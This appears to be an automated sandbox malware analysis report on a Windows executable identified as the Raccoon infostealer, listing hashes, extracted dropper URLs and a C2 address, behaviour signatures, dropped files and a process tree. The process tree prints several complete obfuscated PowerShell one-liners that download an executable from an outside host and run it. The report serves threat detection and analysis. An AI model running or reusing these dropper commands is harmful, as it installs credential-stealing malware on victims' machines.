Analysis

  • max time kernel
    47s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted
    04-02-2023 21:46

General

  • Target

    36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe

  • Size

    332KB

  • MD5

    5c011fd59a60dc0db2dee6f6aa60e79d

  • SHA1

    d0458c2cc16be344791f135d5dbd6cb68888ca29

  • SHA256

    36de4b0fc17f71c1081e39ce702680bef32f4a5ba60145bb9f6759691d1e3460

  • SHA512

    bce00a7b914a1b9018a2f114cba88e52f07f10d1237f77380e58c34fb32380f9c8ecaa2406fcec1d916c85b61a461f8c5dc1da35c63162449eee020ffb2ea2cc

  • SSDEEP

    6144:rWEVkoStOdrlqgh0p7DJ5cAT4HUV39zY1YfAh4Ua/apTBJ6:iECoStOHx2ppTV39Noh4Ua/apTr6

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Family

raccoon

Botnet

75ea4cb7f040eb3056eaa4e86a3a9d6c

C2

http://91.215.85.146/

rc4.plain

Signatures

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 2 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe
    "C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe"
    Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\36DE4B0FC17F71C1081E39CE702680BEF32F4A5BA6014.exe"
      Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL imhur $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;imhur pkzwjshtlmgd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzwjshtlmgd;imhur brvxmhkwft $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JpWA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);brvxmhkwft $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1312
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1a.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfgtiyleoxj $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfgtiyleoxj rxjawksc $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rxjawksc;cfgtiyleoxj lkhxvdgpjitz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);lkhxvdgpjitz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1952
          • C:\Users\Public\brv.exe
            "C:\Users\Public\brv.exe"
            Checks computer location settings
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious use of AdjustPrivilegeToken
            PID:2460
            • C:\Users\Public\brv.exe
              C:\Users\Public\brv.exe
              Executes dropped EXE
              PID:2568
      • C:\Windows\SysWOW64\timeout.exe
        timeout 1
        Delays execution with timeout.exe
        PID:1696
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfpdmyg $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfpdmyg pnuqyjbf $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pnuqyjbf;cfpdmyg josedgvxy $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqaQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);josedgvxy $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:816
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1a.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL pgnfirdewovxsl $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;pgnfirdewovxsl ezosprk $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|ezosprk;pgnfirdewovxsl ctslxmfoz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ctslxmfoz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Loads dropped DLL
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of WriteProcessMemory
          PID:1272
          • C:\Users\Public\brv.exe
            "C:\Users\Public\brv.exe"
            Checks computer location settings
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious use of AdjustPrivilegeToken
            PID:2240
            • C:\Users\Public\brv.exe
              C:\Users\Public\brv.exe
              Executes dropped EXE
              PID:2592
      • C:\Windows\SysWOW64\timeout.exe
        timeout 2
        Delays execution with timeout.exe
        PID:1652
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2.hta"
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        PID:1476
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vqaznm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vqaznm amvlntpxjbs $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|amvlntpxjbs;vqaznm gbxlmur $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqeA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbxlmur $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:892
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2a.hta"
        Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xutrghv $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xutrghv hjlgdycxt $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hjlgdycxt;xutrghv gbljpredwuxzv $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbljpredwuxzv $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
          Blocklisted process makes network request
          Loads dropped DLL
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:268
          • C:\Users\Public\ych.exe
            "C:\Users\Public\ych.exe"
            Checks computer location settings
            Executes dropped EXE
            Suspicious use of SetThreadContext
            Suspicious use of AdjustPrivilegeToken
            PID:2304
            • C:\Users\Public\ych.exe
              C:\Users\Public\ych.exe
              Executes dropped EXE
              PID:2580

Network

MITRE ATT&CK Matrix

Collection

Command and Control

Credential Access

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Downloads

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1.hta
    Filesize

    11KB

    MD5

    d4aea3933a604f7dc3f9608929ef07b6

    SHA1

    95de25c9656d1503b30726760dc6764fa298461e

    SHA256

    9439c1e812b86678969732dd29d9a5c0d271db87005df6b36b79aab7556610e2

    SHA512

    61a1ba9e1d624a00585af95923641145c0fc1a56fac3de3094f8c1a3b7dee37b14088086cce2c78d154e23848d698a68145b44b3086221952ab65bddfc54c038

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b1a.hta
    Filesize

    11KB

    MD5

    b8be7ddadc6d5361e90c28b4739274ac

    SHA1

    a225cf279c6cb7710141aeb3e0a29ad4c19e71e4

    SHA256

    152d6a623e294608e0fcfb331f0fd4e5eabd8d4b70673004d4ac33156add121c

    SHA512

    b4e0b038b7eb43838d7d7d2aad7acc9ee444ac913aa345103efb097c0b41fb70a6aff64e89e75925c4caa2f55d039b1c8121dcb0f540336f7bc6a93746bf9230

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2.hta
    Filesize

    11KB

    MD5

    611851be5c9d72fba0536042853b6b10

    SHA1

    b0ec6e71573902ca1e3fd17bc6fac96d5f232700

    SHA256

    a4965af6feb2c0f3d8c7f81808b77b10bfbb396bcc63fc430f8606b8cf14f24f

    SHA512

    db597666d50850628e17b2c91102b0d45ed613dfa62f3472e6c0e3fec51758347f7327958177a8ba85adc32ca7be7e7c92d7036999270cc84bba1cfcb93b7b33

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\b2a.hta
    Filesize

    11KB

    MD5

    1a98a8caf12608427d1b239c053a41fe

    SHA1

    870e04c385b65d5ba02637f99d12129b76ebae3b

    SHA256

    a9de29fa03e6b7a0d307e495a30bcc181064e67ba4c62b00eecbddcf11034002

    SHA512

    fb967e221882bb9dafec3d651a8031e4f53aed3231b76559a4c50292840fc8bfc496e75baf0f810d93694dbb94ef2cbd85f11cd774d075ab36846d85b4e70c0a

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1.hta
    Filesize

    11KB

    MD5

    b89401d49ae639b07b31c8fb3a2b6660

    SHA1

    50e59ce06aa2bf94a11f64afef20961e76c9d426

    SHA256

    48382eae4aa1e069d09c4a5d25d22e9027b16b65a48911bfc0c8f1f23b1de4a2

    SHA512

    e03a5521a2ecba8d4063d5406d253139540958d510147f962180ad8333175837a8453bb3b69316bb7a8abe66670b42ef9567260f549cbbc2ebb293d2050188b8

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\m1a.hta
    Filesize

    11KB

    MD5

    fd6a9f7c9cf2d58ef8935fa062eab5bf

    SHA1

    a3a03ce457d6820e4344abcbf90330c29aa8ab85

    SHA256

    83c6b29a8be68fa9c0cc88fec453da1c23a456bf330b2cfdff1968da576ec727

    SHA512

    f7598f335765d2e7ac08696e3db18261f8c8a7d901fad4c17839f8b5f1fca38ef38aa653971ddabfa95e9c5b446c4511e0716c0a636e427cb5fbb7eb349b7760

  • C:\Users\Admin\AppData\Local\Temp\F2E8.tmp\start.bat
    Filesize

    152B

    MD5

    e57355079adb8a7e6a12c715d903bb0e

    SHA1

    c91b8e7418cca569a21c23235ee0e9f3fabd5bc5

    SHA256

    c5e6918b630712035a38f8dfc73645659d68504cc268b1a27db8bd81afe80457

    SHA512

    5a3992dd2cfe2ae9a1df92699759900d8d339139b0f41a46b19158397a20ff8fbd45aebd6bdd65651b1c02cf75d578be99128b90ecde4e90c7bb2c6a38cf438c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1e333438ff84ac126a654b2c0f63a42d

    SHA1

    ae99203eef6cba82c0950c56f1dbb6fd3a8a566f

    SHA256

    5cb5277a5eb093298c8686da50d892a63dd01ef513817776f10446fea4c671cd

    SHA512

    4fdf79f483a431f2bf6470d4022a72e4d3dc97fe4fea32444fa0852e5ffcea2cd2de4c233f2214f6adde6fb7ee777d615f764fe7ebabc4acee0a995b6031cc9a

  • C:\Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • C:\Users\Public\brv.exe
    Filesize

    6KB

    MD5

    f251845a1ab43a12774e98a241c2bc4c

    SHA1

    71287491acf4fc24eda8c4eaeb50e01ca827acf2

    SHA256

    61faf60bd3fede8f96f33f86de8728bee226d1cdd164d5c569a5fa1de7148768

    SHA512

    036e74150fd4c8366f644431a3b7b397f00e46cc8a736971d66d383f459d1708641ca0d04d9b9b7865f868fdb17208f49090fca57ae2a9adec6207cf9c131f8c

  • C:\Users\Public\ych.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • \Users\Public\brv.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • \Users\Public\ych.exe
    Filesize

    831KB

    MD5

    f29f6dc54c33b2aae2950019ee54b04c

    SHA1

    c37d98a04edbe68fbd4e054fe0e96b1c926460ea

    SHA256

    8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539

    SHA512

    3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c

  • memory/268-97-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/268-111-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/268-91-0x0000000000000000-mapping.dmp
  • memory/760-61-0x0000000000000000-mapping.dmp
  • memory/816-75-0x0000000000000000-mapping.dmp
  • memory/816-83-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/816-101-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/844-54-0x0000000075831000-0x0000000075833000-memory.dmp
    Filesize

    8KB

  • memory/844-66-0x0000000000400000-0x0000000000422000-memory.dmp
    Filesize

    136KB

  • memory/892-90-0x0000000000000000-mapping.dmp
  • memory/892-114-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/892-96-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1156-55-0x0000000000000000-mapping.dmp
  • memory/1204-59-0x0000000000000000-mapping.dmp
  • memory/1272-76-0x0000000000000000-mapping.dmp
  • memory/1272-106-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1272-84-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1300-73-0x0000000000000000-mapping.dmp
  • memory/1312-100-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1312-81-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1312-65-0x0000000000000000-mapping.dmp
  • memory/1476-86-0x0000000000000000-mapping.dmp
  • memory/1524-89-0x0000000000000000-mapping.dmp
  • memory/1620-71-0x0000000000000000-mapping.dmp
  • memory/1652-74-0x0000000000000000-mapping.dmp
  • memory/1696-62-0x0000000000000000-mapping.dmp
  • memory/1952-82-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/1952-64-0x0000000000000000-mapping.dmp
  • memory/1952-121-0x0000000071E90000-0x000000007243B000-memory.dmp
    Filesize

    5MB

  • memory/2240-112-0x0000000000970000-0x0000000000A46000-memory.dmp
    Filesize

    856KB

  • memory/2240-123-0x0000000004480000-0x0000000004512000-memory.dmp
    Filesize

    584KB

  • memory/2240-103-0x0000000000000000-mapping.dmp
  • memory/2304-113-0x0000000000F70000-0x0000000001046000-memory.dmp
    Filesize

    856KB

  • memory/2304-117-0x0000000004DC0000-0x0000000004E94000-memory.dmp
    Filesize

    848KB

  • memory/2304-122-0x0000000000C30000-0x0000000000C7A000-memory.dmp
    Filesize

    296KB

  • memory/2304-108-0x0000000000000000-mapping.dmp
  • memory/2460-118-0x0000000000000000-mapping.dmp
  • memory/2568-130-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2568-137-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2568-147-0x00000000004088ED-mapping.dmp
  • memory/2568-125-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2568-124-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2580-140-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/2580-142-0x00000000004088ED-mapping.dmp
  • memory/2592-151-0x00000000004088ED-mapping.dmp